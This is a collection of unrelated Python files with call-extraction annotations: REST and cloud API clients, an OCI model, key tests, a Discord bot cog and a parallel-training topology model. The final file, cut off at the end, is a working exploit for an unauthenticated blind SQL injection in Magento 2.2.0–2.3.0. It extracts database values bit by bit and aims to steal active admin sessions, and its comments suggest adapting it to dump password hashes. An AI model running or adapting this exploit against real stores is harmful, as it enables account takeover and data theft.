from rest_framework.routers import SimpleRouter
router = SimpleRouter()
urlpatterns = router.urls
|
[
"rest_framework.routers.SimpleRouter"
] |
[((59, 73), 'rest_framework.routers.SimpleRouter', 'SimpleRouter', ([], {}), '()\n', (71, 73), False, 'from rest_framework.routers import SimpleRouter\n')]
|
from json.decoder import JSONDecodeError
from typing import Any, Dict, List, Optional
import requests
def fetch_ip_addresses(
    headers: Optional[Dict[str, str]] = None, instance: Optional[str] = None
) -> Any:
url = "https://api.packet.net/devices/{}".format(instance)
response = requests.get(url, headers=headers)
try:
response_payload = response.json()
if "ip_addresses" not in response_payload:
return []
else:
return response_payload["ip_addresses"]
except JSONDecodeError as e:
raise JSONDecodeError(
"Unable to decode API/metadata response for {}. {}".format(url, e.msg),
e.doc,
e.pos,
)
def fetch_bgp(
use_metadata: bool = True,
    headers: Optional[Dict[str, str]] = None,
instance: Optional[str] = None,
) -> Any:
url = "https://metadata.packet.net/metadata"
ip_addresses = []
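    # Without the metadata service, query the public device API instead and fetch the
    # instance's IP addresses separately so they can be merged into the response below.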
if not use_metadata:
if not instance:
raise ValueError("Instance ID must be specified when not using metadata")
url = "https://api.packet.net/devices/{}/bgp/neighbors".format(instance)
ip_addresses = fetch_ip_addresses(headers=headers, instance=instance)
response = requests.get(url, headers=headers)
try:
response_payload = response.json()
if not use_metadata:
response_payload["network"] = {"addresses": ip_addresses}
return response_payload
except JSONDecodeError as e:
raise JSONDecodeError(
"Unable to decode API/metadata response for {}. {}".format(url, e.msg),
e.doc,
e.pos,
)
|
[
"requests.get"
] |
[((282, 316), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (294, 316), False, 'import requests\n'), ((1214, 1248), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (1226, 1248), False, 'import requests\n')]
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDrgAttachmentDetails(object):
"""
UpdateDrgAttachmentDetails model.
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateDrgAttachmentDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateDrgAttachmentDetails.
:type display_name: str
:param drg_route_table_id:
The value to assign to the drg_route_table_id property of this UpdateDrgAttachmentDetails.
:type drg_route_table_id: str
:param network_details:
The value to assign to the network_details property of this UpdateDrgAttachmentDetails.
:type network_details: oci.core.models.DrgAttachmentNetworkUpdateDetails
:param defined_tags:
The value to assign to the defined_tags property of this UpdateDrgAttachmentDetails.
:type defined_tags: dict(str, dict(str, object))
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateDrgAttachmentDetails.
:type freeform_tags: dict(str, str)
:param export_drg_route_distribution_id:
The value to assign to the export_drg_route_distribution_id property of this UpdateDrgAttachmentDetails.
:type export_drg_route_distribution_id: str
:param route_table_id:
The value to assign to the route_table_id property of this UpdateDrgAttachmentDetails.
:type route_table_id: str
"""
self.swagger_types = {
'display_name': 'str',
'drg_route_table_id': 'str',
'network_details': 'DrgAttachmentNetworkUpdateDetails',
'defined_tags': 'dict(str, dict(str, object))',
'freeform_tags': 'dict(str, str)',
'export_drg_route_distribution_id': 'str',
'route_table_id': 'str'
}
self.attribute_map = {
'display_name': 'displayName',
'drg_route_table_id': 'drgRouteTableId',
'network_details': 'networkDetails',
'defined_tags': 'definedTags',
'freeform_tags': 'freeformTags',
'export_drg_route_distribution_id': 'exportDrgRouteDistributionId',
'route_table_id': 'routeTableId'
}
self._display_name = None
self._drg_route_table_id = None
self._network_details = None
self._defined_tags = None
self._freeform_tags = None
self._export_drg_route_distribution_id = None
self._route_table_id = None
@property
def display_name(self):
"""
Gets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:return: The display_name of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:param display_name: The display_name of this UpdateDrgAttachmentDetails.
:type: str
"""
self._display_name = display_name
@property
def drg_route_table_id(self):
"""
Gets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._drg_route_table_id
@drg_route_table_id.setter
def drg_route_table_id(self, drg_route_table_id):
"""
Sets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param drg_route_table_id: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._drg_route_table_id = drg_route_table_id
@property
def network_details(self):
"""
Gets the network_details of this UpdateDrgAttachmentDetails.
:return: The network_details of this UpdateDrgAttachmentDetails.
:rtype: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
return self._network_details
@network_details.setter
def network_details(self, network_details):
"""
Sets the network_details of this UpdateDrgAttachmentDetails.
:param network_details: The network_details of this UpdateDrgAttachmentDetails.
:type: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
self._network_details = network_details
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def export_drg_route_distribution_id(self):
"""
Gets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._export_drg_route_distribution_id
@export_drg_route_distribution_id.setter
def export_drg_route_distribution_id(self, export_drg_route_distribution_id):
"""
Sets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param export_drg_route_distribution_id: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._export_drg_route_distribution_id = export_drg_route_distribution_id
@property
def route_table_id(self):
"""
Gets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:return: The route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._route_table_id
@route_table_id.setter
def route_table_id(self, route_table_id):
"""
Sets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:param route_table_id: The route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._route_table_id = route_table_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
[
"oci.util.formatted_flat_dict"
] |
[((11878, 11903), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (11897, 11903), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')]
|
import json
import urllib.request
from dotenv import load_dotenv
import os
from pathlib import Path
from urllib.parse import quote
# configurations required to use .env
dotenv_path = Path('./.env')
load_dotenv(dotenv_path=dotenv_path)
API_KEY = os.getenv('API_KEY')
API_ID = os.getenv('API_ID')
def get_media(keyword, type):
    #replace spaces with %20
    keyword = quote(keyword)
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?q={keyword}&type={type}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
    #create a media object and add it to the list
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
def get_tag(type, category):
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?type={type}&category={category}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
    #create a media object and add it to the list
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
|
[
"json.loads",
"dotenv.load_dotenv",
"urllib.parse.quote",
"pathlib.Path",
"os.getenv"
] |
[((189, 203), 'pathlib.Path', 'Path', (['"""./.env"""'], {}), "('./.env')\n", (193, 203), False, 'from pathlib import Path\n'), ((204, 240), 'dotenv.load_dotenv', 'load_dotenv', ([], {'dotenv_path': 'dotenv_path'}), '(dotenv_path=dotenv_path)\n', (215, 240), False, 'from dotenv import load_dotenv\n'), ((251, 271), 'os.getenv', 'os.getenv', (['"""API_KEY"""'], {}), "('API_KEY')\n", (260, 271), False, 'import os\n'), ((281, 300), 'os.getenv', 'os.getenv', (['"""API_ID"""'], {}), "('API_ID')\n", (290, 300), False, 'import os\n'), ((386, 400), 'urllib.parse.quote', 'quote', (['keyword'], {}), '(keyword)\n', (391, 400), False, 'from urllib.parse import quote\n'), ((602, 618), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (612, 618), False, 'import json\n'), ((1087, 1103), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (1097, 1103), False, 'import json\n')]
|
# coding: utf-8
from django.test import TestCase
from cryptography.hazmat.primitives.asymmetric import rsa
from bounca.certificate_engine.ssl.key import Key
class KeyTest(TestCase):
def test_generate_private_key_2048(self):
keyhandler = Key()
keyhandler.create_key(2048)
self.assertEqual(keyhandler.key.key_size, 2048)
pkey = keyhandler.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_generate_private_key_4096(self):
prvkey = Key().create_key(4096)
self.assertEqual(prvkey.key.key_size, 4096)
pkey = prvkey.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_serialize_keys_passphrase(self):
key = Key()
key.create_key(4096)
pem = key.serialize(b'test_store_keys_passphrase')
prvkey = key.load(pem, b'test_store_keys_passphrase')
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 4096)
def test_store_keys_no_object(self):
key = Key()
with self.assertRaisesMessage(RuntimeError, "No key object"):
key.serialize(b'test_store_keys_passphrase')
def test_store_keys_no_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize()
key = Key()
prvkey = key.load(pem)
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 2048)
def test_store_keys_wrong_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_store_keys_wrong_passphrase')
with self.assertRaisesMessage(ValueError, 'Bad decrypt. Incorrect password?'):
key.load(pem, b'test_store_keys_passphrase')
def test_check_passphrase_valid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'check_passphrase')
self.assertTrue(key.check_passphrase(pem, b'check_passphrase'))
def test_check_passphrase_invalid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_check_passphrase_invalid')
self.assertFalse(key.check_passphrase(pem, b'check_passphrase'))
|
[
"bounca.certificate_engine.ssl.key.Key"
] |
[((255, 260), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (258, 260), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((785, 790), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (788, 790), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1110, 1115), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1113, 1115), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1303, 1308), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1306, 1308), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1382, 1387), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1385, 1387), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1595, 1600), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1598, 1600), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1897, 1902), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1900, 1902), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((2113, 2118), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (2116, 2118), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((535, 540), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (538, 540), False, 'from bounca.certificate_engine.ssl.key import Key\n')]
|
from discord.ext import commands
import discord
import asyncio
import logging
class AdminUtilsCog(commands.Cog, name="Admin Utilities"):
"""Cog for administrative commands, be these for users or to manage the bot.
All commands within this cog require administrative permissions or admin-like roles
"""
def __init__(self, bot):
self.bot = bot
self.db_conn_cog = None
self.logger = logging.getLogger("SVGEBot.AdminUtils")
self.delete_message_after = self.bot.bot_config["delete_msg_after"]
self.logger.info("Loaded AdminUtils")
@commands.Cog.listener()
async def on_ready(self):
self.db_conn_cog = self.bot.get_cog("DBConnPool")
async def cog_check(self, ctx):
"""This method is a cog wide check to ensure users have "admin" roles,
It will be called without the need for check decorators on every command.
"""
for role in ctx.message.author.roles:
if role.id in self.bot.bot_config["admin_role_id_list"]:
return True
return False
def cog_unload(self):
self.logger.info("Unloaded AdminUtils")
@commands.command()
async def shutdown(self, ctx):
"""Shuts the bot process down gracefully."""
await ctx.send(":wave:", delete_after=1)
        try:
            await self.db_conn_cog.shutdown()
        except AttributeError:
            # db_conn_cog is still None if on_ready never ran
            pass
await asyncio.sleep(2)
await self.bot.logout()
self.logger.info("Logged out and closed Discord API connection")
self.logger.info("Closing process")
# This sleep is to avoid background loops getting messed with by an
# abrupt exit.
await asyncio.sleep(4)
exit(0)
@commands.command()
async def change_presence(self, ctx, activity, text=">>help"):
"""Changes the bot "presence" statement to that defined in command,
permitting it is one of those permitted by discord.
Command originally written for CyclopsBot by JayDwee.
:arg ctx: Command context, auto-filled by API wrapper.
:arg activity: Activity for the bot to display, must be one of:
:arg text: Text following the activity term"""
activity_list = {
"watching": discord.ActivityType.watching,
"streaming": discord.ActivityType.streaming,
"playing": discord.ActivityType.playing,
"listening": discord.ActivityType.listening
}
if activity.lower() not in activity_list.keys():
            await ctx.send(f'"{activity}" is an invalid activity. "watching", "streaming", '
f'"playing", and "listening" are currently supported',
delete_after=self.bot.delete_msg_after)
return
activity_type_to_show = discord.Activity(activity=activity_list[activity.lower()],
name=text)
await self.bot.change_presence(activity=activity_type_to_show)
self.logger.info(f"Activity changed to {activity} {text}")
await ctx.send(f"Activity changed as requested.", delete_after=self.bot.delete_msg_after)
def setup(bot):
bot.add_cog(AdminUtilsCog(bot))
|
[
"asyncio.sleep",
"discord.ext.commands.command",
"logging.getLogger",
"discord.ext.commands.Cog.listener"
] |
[((591, 614), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (612, 614), False, 'from discord.ext import commands\n'), ((1159, 1177), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1175, 1177), False, 'from discord.ext import commands\n'), ((1749, 1767), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1765, 1767), False, 'from discord.ext import commands\n'), ((423, 462), 'logging.getLogger', 'logging.getLogger', (['"""SVGEBot.AdminUtils"""'], {}), "('SVGEBot.AdminUtils')\n", (440, 462), False, 'import logging\n'), ((1431, 1447), 'asyncio.sleep', 'asyncio.sleep', (['(2)'], {}), '(2)\n', (1444, 1447), False, 'import asyncio\n'), ((1710, 1726), 'asyncio.sleep', 'asyncio.sleep', (['(4)'], {}), '(4)\n', (1723, 1726), False, 'import asyncio\n')]
|
import util
import sys as _sys
class Topology:
def __init__(self, exp_config):
#System parameters
self.par2Dev = exp_config.system_config.device_placement.par2Dev
self.num_wafers = exp_config.system_config.num_wafers
self.num_nodes_per_wafer= exp_config.system_config.num_nodes_per_wafer
self.tot_nodes = exp_config.system_config.tot_nodes
self.adj = [[0 for x in range(self.tot_nodes)] for x in range(self.tot_nodes)]
#Parallelization Params
self.lp_dim = exp_config.sch_config.lp
self.dp_dim = exp_config.sch_config.dp
h1 = exp_config.sch_config.kp_hidden_dim1
s1 = exp_config.sch_config.kp_softmax_dim1
e1 = exp_config.sch_config.kp_embedding_dim1
p1 = exp_config.sch_config.kp_projection_dim1
h2 = exp_config.sch_config.kp_hidden_dim2
s2 = exp_config.sch_config.kp_softmax_dim2
e2 = exp_config.sch_config.kp_embedding_dim2
p2 = exp_config.sch_config.kp_projection_dim2
self.kp_dim = max(h1 * h2, s1 * s2, p1 * p2, e1 * e2)
#Verify system_hierarchy configuration is valid
try:
self.sanityCheckSysHierarchy()
except Exception as e:
print("Unexpected error occurred during sanity check of system hierarchy:\n"
"{}".format(e), flush=True)
_sys.exit(0)
#Network parameters
        self.data_intra = True
        self.kernel_intra = True
        self.layer_intra = True
self.mem_frac = exp_config.perimeter_breakdown.DRAM
self.inter_frac = exp_config.perimeter_breakdown.inter_node
self.intra_frac = exp_config.perimeter_breakdown.intra_node
        self.createAdjacencyMatrix(kp=self.kp_dim, lp=self.lp_dim, dp=self.dp_dim)
self.interNodeDegree, self.intraNodeDegree = self.findMaxDegree()
self.intra_par = True if self.intraNodeDegree > 0 else False
self.inter_par = True if self.interNodeDegree > 0 else False
def sanityCheckSysHierarchy(self):
assert (self.tot_nodes == self.dp_dim * self.kp_dim * self.lp_dim), "tot_nodes != dp * kp * lp"
for key, val in self.par2Dev.items():
wafer_id, node_id = val
dp, lp, kp = key
#assert (dp < self.dp_dim), "data shard index out of bound"
assert (dp < self.dp_dim), "@wafer {}, node {}, data shard index ({}) >= data parallel shards ({})".format(wafer_id, node_id, dp, self.dp_dim)
assert (kp < self.kp_dim), "@wafer {}, node {}, kernel shard index ({}) >= kernel parallel shards ({})".format(wafer_id, node_id, kp, self.kp_dim)
assert (lp < self.lp_dim), "@wafer {}, node {}, layer shard index ({}) >= layer parallel shards ({})".format(wafer_id, node_id, lp, self.lp_dim)
def node_id(self, point):
wafer_id, node_id = point
return wafer_id * self.num_nodes_per_wafer + node_id
    def createAdjacencyMatrix(self, kp, lp, dp):
#0 not connected
#1 connected internally
#2 connected externally
#connect kernel parallel connections
#Assumption: reduction is performed through ring-all-reduce algorithm
for i in range(0, dp):
for j in range(0, lp):
for k in range(0, kp):
                    start_point = self.par2Dev[(i,j,k)]
                    end_point = self.par2Dev[(i,j,(k+1) % kp)]
                    start_point_id = self.node_id(start_point)
                    end_point_id = self.node_id(end_point)
                    if start_point_id != end_point_id:
                        start_point_wafer_id,_ = start_point
                        end_point_wafer_id,_ = end_point
                        self.adj[start_point_id][end_point_id] = \
                            (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                        if start_point_wafer_id != end_point_wafer_id:
                            self.kernel_intra = False
#connect layer parallel connections
#Assumption: across layers, for a given data shard, each kernel shard
#need to have connections to all kernel shards in previous layers.
        #FIXME: This can be overkill depending on the type of kernel parallelism.
for i in range(0, dp):
for j in reversed(range(1, lp)):
for k in range(0, kp):
                    end_point = self.par2Dev[(i,j,k)]
                    for m in range(0, kp):
                        start_point = self.par2Dev[(i,j-1,m)]
                        start_point_id = self.node_id(start_point)
                        end_point_id = self.node_id(end_point)
                        if start_point_id != end_point_id:
                            start_point_wafer_id,_ = start_point
                            end_point_wafer_id,_ = end_point
                            self.adj[start_point_id][end_point_id] = \
                                (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                            if start_point_wafer_id != end_point_wafer_id:
                                self.layer_intra = False
#connect data parallel connections
#Assumption: within a layer, each parallel kernel can be reduced
for j in range(0, lp):
for k in range(0, kp):
for i in range(0, dp):
                    start_point = self.par2Dev[(i,j,k)]
                    end_point = self.par2Dev[((i + 1) % dp,j,k)]
                    start_point_id = self.node_id(start_point)
                    end_point_id = self.node_id(end_point)
                    if start_point_id != end_point_id:
                        start_point_wafer_id,_ = start_point
                        end_point_wafer_id,_ = end_point
                        self.adj[start_point_id][end_point_id] = \
                            (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                        if start_point_wafer_id != end_point_wafer_id:
                            self.data_intra = False
#Across all wafers, across all nodes, find maximum inter and intra node degree
def findMaxDegree(self):
max_interNodeDegree = 0
max_intraNodeDegree = 0
for wid in range(0, self.num_wafers):
for cid in range(0, self.num_nodes_per_wafer):
                nid = self.node_id((wid,cid))
interNodeDegree = 0
intraNodeDegree = 0
for i in range(0, self.tot_nodes):
if (self.adj[nid][i] == 1):
intraNodeDegree = intraNodeDegree + 1
elif (self.adj[nid][i] == 2):
interNodeDegree = interNodeDegree + 1
if (interNodeDegree > max_interNodeDegree):
max_interNodeDegree = interNodeDegree
if (intraNodeDegree > max_intraNodeDegree):
max_intraNodeDegree = intraNodeDegree
return max_interNodeDegree, max_intraNodeDegree
def get_fractions(self):
return self.inter_frac, self.intra_frac
#get P2P bandwidth between data shards
def getDataThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.data_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between kernel shards
def getKernelThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.kernel_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between layer shards
def getLayerThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.layer_intra
else (inter_bw, inter_lat))
|
[
"sys.exit"
] |
[((1505, 1517), 'sys.exit', '_sys.exit', (['(0)'], {}), '(0)\n', (1514, 1517), True, 'import sys as _sys\n')]
|
# %%
# test out geopy
import os
os.chdir(os.path.dirname(os.getcwd())) # change the working directory to one level up from the current directory
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent='<PASSWORD>_agent')
location = geolocator.geocode('175 5th Avenue NYC')
print(location.address)
print((location.latitude, location.longitude))
#print(location.raw)
# %%
# test out python maps
import folium
m = folium.Map(location=[location.latitude, location.longitude], zoom_start=13)
m.save('outputs/test-map.html')
# %%
|
[
"os.getcwd",
"folium.Map",
"geopy.geocoders.Nominatim"
] |
[((175, 215), 'geopy.geocoders.Nominatim', 'Nominatim', ([], {'user_agent': '"""<PASSWORD>_agent"""'}), "(user_agent='<PASSWORD>_agent')\n", (184, 215), False, 'from geopy.geocoders import Nominatim\n'), ((408, 483), 'folium.Map', 'folium.Map', ([], {'location': '[location.latitude, location.longitude]', 'zoom_start': '(13)'}), '(location=[location.latitude, location.longitude], zoom_start=13)\n', (418, 483), False, 'import folium\n'), ((57, 68), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (66, 68), False, 'import os\n')]
|
#!/usr/bin/env python3
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi
# <NAME>
# 2019-03-22
#
# SOURCE & SINK
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.
# If your target runs Magento < 2.2.0, you need to find another source.
#
# SQL INJECTION
# The exploit can easily be modified to obtain other stuff from the DB, for
# instance admin/user password hashes.
#
import requests
import string
import binascii
import re
import random
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
sid = sqli.get_most_recent_session()
except ExploitError as e:
print('Error: %s' % e)
def random_string(n=8):
return ''.join(random.choice(string.ascii_letters) for _ in range(n))
class ExploitError(Exception):
pass
class Browser:
"""Basic browser functionality along w/ URLs and payloads.
"""
PROXY = None
def __init__(self, URL):
self.URL = URL
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {
'http': self.PROXY,
'https': self.PROXY,
}
class SQLInjection(Browser):
"""SQL injection stuff.
"""
def encode(self, string):
return '0x' + binascii.b2a_hex(string.encode()).decode()
def find_test_method(self):
"""Tries to inject using an error-based technique, or falls back to timebased.
"""
for test_method in (self.test_error, self.test_timebased):
if test_method('123=123') and not test_method('123=124'):
self.test = test_method
break
else:
raise ExploitError('Test SQL injections failed, not vulnerable ?')
def test_timebased(self, condition):
"""Runs a test. A valid condition results in a sleep of 1 second.
"""
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.elapsed.total_seconds() > 1
def test_error(self, condition):
"""Runs a test. An invalid condition results in an SQL error.
"""
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
if r.status_code not in (200, 400):
raise ExploitError(
'SQL injection does not yield a correct HTTP response'
)
return r.status_code == 400
def word(self, name, sql, size=None, charset=None):
"""Dichotomically obtains a value.
"""
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'
full = ''
check = False
if size is None:
# Yeah whatever
size_size = self.word(
name,
'LENGTH(LENGTH(%s))' % sql,
size=1,
charset=string.digits
)
size = self.word(
name,
'LENGTH(%s)' % sql,
size=int(size_size),
charset=string.digits
)
size = int(size)
print("%s: %s" % (name, full), end='\r')
for p in range(size):
c = charset
while len(c) > 1:
middle = len(c) // 2
h0, h1 = c[:middle], c[middle:]
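                # LOCATE(...)=0 is true when the target character is absent from h0, so keep h1; otherwise keep h0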
condition = pattern % (sql, p+1, self.encode(h0))
c = h1 if self.test(condition) else h0
full += c
print("%s: %s" % (name, full), end='\r')
print(' ' * len("%s: %s" % (name, full)), end='\r')
return full
def get_most_recent_session(self):
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the
backend.
"""
# This is the default admin session timeout
session_timeout = 900
query = (
'SELECT %%s FROM admin_user_session '
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'
) % session_timeout
# Check if a session is available
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))
if not available:
raise ExploitError('No session is available')
